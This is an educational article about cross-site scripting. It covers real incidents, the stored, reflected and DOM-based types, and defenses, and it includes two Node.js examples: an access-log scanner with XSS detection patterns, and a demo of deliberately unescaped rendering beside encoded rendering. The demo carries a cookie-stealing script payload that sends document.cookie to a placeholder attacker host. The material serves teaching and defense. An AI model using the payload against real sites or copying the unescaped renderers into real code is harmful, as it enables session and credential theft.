by peter


Cross-Site Scripting Explained

Risk

Risk Rating: HIGH
Likelihood: 3/5
Impact: 4/5

Causes

  • No Web Application Firewall in front of the application (a WAF is a compensating control, not a substitute for correct encoding)
  • Application code that echoes user input into pages without validation or output encoding
  • Poor server management, such as forgotten legacy pages and unreviewed third-party scripts

Cross-Site Scripting Overview

In late 2015 and early 2016, eBay had a severe Cross-Site Scripting vulnerability. The website used a “url” parameter to send users to different pages on the platform, but the value of that parameter was never validated. This allowed attackers to inject malicious JavaScript into eBay pages.

The vulnerability enabled attackers to gain full access to eBay seller accounts, sell products at a discount, and steal payment details. It was actively used by attackers to manipulate eBay listings of high value products such as vehicles. eBay eventually remediated the vulnerability, but follow-on attacks continued until 2017.

In 2018, British Airways was attacked by Magecart, a high-profile criminal group known for credit card skimming attacks. The group exploited an XSS vulnerability in a JavaScript library called Feedify, which was used on the British Airways website.

Attackers modified the script so that, when a customer submitted the payment form, a copy of the data was sent to a server under their control, which used a domain name resembling British Airways. The attacker's server had a valid TLS certificate, so the browser raised no warning and users had no reason to suspect anything. The skimmer ran on roughly 380,000 booking transactions before the breach was discovered.

In 2019, the popular multiplayer game Fortnite had an XSS vulnerability that put over 200 million users at risk. A retired, unsecured page went unnoticed by Fortnite developers. The page had an XSS vulnerability that allowed attackers to gain unauthorized access to the data of any Fortnite user.

Attackers could have used Cross-Site Scripting, in combination with a flaw in the single sign-on (SSO) flow, to send users to a fake login page. This would have allowed them to steal virtual currency within the game and record player conversations as reconnaissance for future attacks. Check Point discovered the vulnerability and notified Epic Games, but it is unknown whether attackers exploited it in the interim.

In January 2019, an XSS vulnerability was discovered in the Steam Chat client operated by Valve, a computer gaming company with more than 90 million active users, any number of whom could have been attacked until the bug was disclosed.

Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. It is conceptually like SQL injection, in which malicious input is submitted through a form to gain access to the site's database, except that in the case of XSS the malicious code is designed to execute within the browser of another visitor to the site. That lets the attacker steal the victim's cookies, read session identifiers, alter the contents of the page, or redirect the user to a malicious site.

What you need to know

XSS attacks occur when an attacker uses a web application to deliver malicious code, generally in the form of a browser-side script, to a different end user. The flaws that allow these attacks to succeed are widespread and occur anywhere a web application includes user-supplied input in the output it generates without validating or encoding it. The end user's browser has no way to know that the script should not be trusted, so it executes it. Because the script arrived from a trusted origin, it runs with that site's privileges and can read cookies, session tokens, and other sensitive information the browser holds for the site. Such scripts can also rewrite the content of the HTML page.

The best defense against cross-site scripting attacks is to ensure your web application code is written well and to OWASP standards: encode every piece of untrusted data for the context it lands in (HTML body, attribute, JavaScript, URL), validate input against what the application actually expects, set a Content Security Policy to limit where scripts may load from, and mark session cookies HttpOnly so a script cannot read them. Regular web application penetration testing is essential to find the small issues that lead to exploitable vulnerabilities.

Your Security Operations Center should always be on the lookout for XSS attacks, especially where a number of attempts are linked together in an attack chain, as this can be a sign of a successful attack rather than random scanning.
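The kind of check the previous paragraph asks of a SOC, as an added example that is not part of the original article: a small Node.js script that scans web-server access logs for XSS probing and links repeated attempts from one client into a chain. The log lines are constructed for this example in Apache/Nginx "combined" format (the IPs are documentation addresses and attacker.example is a placeholder); the pattern list is a starting point, not a complete signature set.

```javascript
// Added example (not from the original article): flag XSS probes in access logs
// and group repeated hits per source IP into a likely attack chain.

// Constructed sample log lines in "combined" format (not real traffic).
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5200 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /search?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 5210 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /profile?name=%3Cscript%20src%3D%2F%2Fattacker.example%2Fx.js%3E%3C%2Fscript%3E HTTP/1.1" 200 4300 "-" "Mozilla/5.0"',
  '198.51.100.12 - - [10/Oct/2023:13:57:10 +0000] "GET /search?q=javascript%3Aalert(1) HTTP/1.1" 200 5100 "-" "curl/8.0"',
  '192.0.2.33 - - [10/Oct/2023:13:58:00 +0000] "GET /search?q=red+jacket HTTP/1.1" 200 5130 "-" "Mozilla/5.0"',
];

// Patterns that rarely appear in legitimate query strings once URL-decoded.
// The event-handler list is explicit on purpose: a generic /on[a-z]+=/ would
// fire on harmless parameters such as "option=" or "one=".
const XSS_PATTERNS = [
  /<\s*script\b/i,                                   // <script ...>
  /\bon(error|load|click|mouseover|focus)\s*=/i,     // inline event handlers
  /javascript\s*:/i,                                 // javascript: URL scheme
  /<\s*(img|svg|iframe|object)\b/i,                  // common non-script vectors
];

// ip, ident, user, [time], "METHOD PATH PROTOCOL", status
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;

// Decode repeatedly (bounded): attackers double-encode to slip past naive filters.
function fullyDecode(s) {
  let cur = s;
  for (let i = 0; i < 3; i++) {
    const prev = cur;
    try {
      cur = decodeURIComponent(cur.replace(/\+/g, ' '));
    } catch {
      break;                                  // malformed escape: keep what we have
    }
    if (cur === prev) break;
  }
  return cur;
}

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Names (regex sources) of every pattern the decoded path matches.
function matchedPatterns(path) {
  const decoded = fullyDecode(path);
  return XSS_PATTERNS.filter((re) => re.test(decoded)).map((re) => re.source);
}

// Returns the flagged requests, a per-IP tally, and the IPs whose tally reaches
// chainThreshold, i.e. clients that are iterating payloads rather than scanning once.
function analyzeLog(lines, chainThreshold = 3) {
  const hits = [];
  const perIp = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const patterns = matchedPatterns(rec.path);
    if (patterns.length === 0) continue;
    hits.push({ ...rec, patterns });
    perIp.set(rec.ip, (perIp.get(rec.ip) || 0) + 1);
  }
  const chains = [...perIp].filter(([, n]) => n >= chainThreshold).map(([ip]) => ip);
  return { hits, perIp: Object.fromEntries(perIp), chains };
}

console.log(JSON.stringify(analyzeLog(SAMPLE_LOG), null, 2));
```

Run it with `node xss-log-scan.js`; against the sample it reports four flagged requests and one chain (203.0.113.7, three escalating payloads within a minute). In production, feed it the decoded request path and body from your log pipeline, and treat a chain as a trigger to check whether the targeted parameter actually reflects, not as proof of compromise on its own.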

How the Cross-Site Scripting attack happens

There are three main types of Cross-Site Scripting (XSS) attacks: stored, reflected, and DOM-based. Stored XSS occurs when an injected script is saved on the server in a fixed location, like a forum post or comment, so every user who loads the page containing it is affected. In reflected XSS, the injected script arrives in a single request (typically a link the victim is tricked into following) and is echoed back in the response, like a search results page that repeats the search term. In DOM-based XSS the server is not involved at all: client-side JavaScript reads attacker-controlled data such as the URL fragment and writes it into the page unsafely.
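The stored and reflected cases described above, as an added example that is not from the original article: a minimal Node.js rendering layer with the vulnerable version of each page beside a hardened one that HTML-encodes untrusted input. The search page, the in-memory comment store, the cookie-stealing payload and the host attacker.example are all constructed for this example.

```javascript
// Added example (not from the original article): reflected and stored XSS in a
// tiny page-rendering layer, vulnerable render beside the encoded one.

// Attacker-supplied input: ships the victim's cookies to a host the attacker
// controls (attacker.example is a placeholder, not a real endpoint).
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Encoder for HTML element content and double-quoted attribute values: every
// character that can change HTML structure becomes an entity.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// --- Reflected XSS: the ?q= search term is echoed straight back into the page ---
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;             // raw interpolation: payload runs
}

function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`; // payload shown as text
}

// --- Stored XSS: a comment is saved once and served to every later visitor ---
const comments = [];                                   // constructed in-memory store

function postComment(author, body) {
  comments.push({ author, body });                     // stored verbatim, as many apps do
}

function renderCommentsVulnerable() {
  return comments.map((c) => `<li><b>${c.author}</b>: ${c.body}</li>`).join('');
}

function renderCommentsSafe() {
  return comments
    .map((c) => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join('');
}

// Crude oracle: does the rendered HTML still contain an executable <script>
// start tag? Encoded output never does, because "<" became "&lt;".
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Simulate the attacker's crafted link (reflected) and poisoned comment (stored),
// then render each page as a victim's browser would receive it.
function demo() {
  const link = new URL('https://shop.example/search?q=' + encodeURIComponent(PAYLOAD));
  const query = link.searchParams.get('q');            // what the handler reads from ?q=
  postComment('mallory', PAYLOAD);
  return {
    reflectedVulnerable: containsScriptTag(renderSearchVulnerable(query)),
    reflectedSafe: containsScriptTag(renderSearchSafe(query)),
    storedVulnerable: containsScriptTag(renderCommentsVulnerable()),
    storedSafe: containsScriptTag(renderCommentsSafe()),
  };
}

console.log(demo());
```

The fix is the same for both variants: encode at output time, for the context the data lands in. Note that `escapeHtml` is only correct for element content and quoted attributes; data placed inside a `<script>` block, an `href`, or an unquoted attribute needs the encoder for that context, which is why a template engine with context-aware auto-escaping beats hand-rolled string building.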

Attack Sources

While Cross-Site Scripting attacks are not as common as they once were, due primarily to improvements in browsers and security technology, they are still prevalent enough to rank within the top ten threats listed by the Open Web Application Security Project (OWASP), and the Common Vulnerabilities and Exposures (CVE) database lists nearly 14,000 vulnerabilities associated with XSS.